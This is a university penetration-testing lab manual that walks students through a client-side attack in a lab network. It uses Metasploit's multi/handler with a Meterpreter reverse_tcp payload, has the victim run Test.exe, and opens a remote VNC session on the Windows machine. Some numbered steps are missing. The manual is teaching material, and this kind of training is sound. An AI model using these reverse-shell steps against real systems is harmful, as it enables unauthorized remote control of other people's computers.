Lab 5.1- VNC Session_system hacking
Lab 5.1- VNC Session_system hacking
Information Sciences
CYS405 Penetration Testing and Ethical
Hacking
Lab Manual
Assignment # 6
Student Name
ID
Serial Number
Grade
Q#1
Q#2
Total
Notes:
The goal of system hacking is to gain access, escalate privileges, execute applications, and hide files.
The objective of this lab is to help students learn to monitor a system remotely and to
extract hidden files and other tasks that include:
Lab Scenario
VNC enables attackers to remotely access and control computers targeted from another computer or
mobile device, wherever they are in the world. At the same time, it is also used by network
administrators and organizations throughout every industry sector for a range of different scenarios
and use cases, including providing IT desktop support to colleagues and friends, and accessing
systems and services on the move. Here, we will see how attackers can exploit vulnerabilities in target
systems to establish unauthorized VNC sessions and remotely control these targets.
Lab Objectives
The objective of this lab is to help students learn how to exploit client-side vulnerabilities and
establish a VNC session.
4. Start the Apache server by typing service apache2 start and press Enter.
5. In the terminal window, type msfconsole and press Enter to start the Metasploit
Framework.
6. Once the metasploit framework starts and you get a msf command line, type the
following commands to set up a listener:
o Type use multi/handler and press Enter.
o Type set payload windows/meterpreter/reverse_tcp and press Enter.
o Type set LHOST 10.10.10.11 and press Enter.
o Type set LPORT 444 and press Enter.
10. The Test.exe file gets saved on the Desktop of Windows 10 machine, double-click the
executable to run it.
11. click Kali Linux, observe that one session is created or opened in the Meterpreter shell.
If the meterpreter command line does not start interacting with the victim machine automatically,
type sessions -i 1 and press Enter to start interacting with the victim machine
12. In the meterpreter command line type sysinfo and press Enter to get the system
information of the victim machine.
13. Type run vnc and press Enter to start a VNC session with the victim.
14. TightVNC: window appears with the victim Desktop showing in the window.
15. Close all the open windows after finishing the lab.
In this lab you learned how to exploit client side vulnerabilities and establish a VNC session.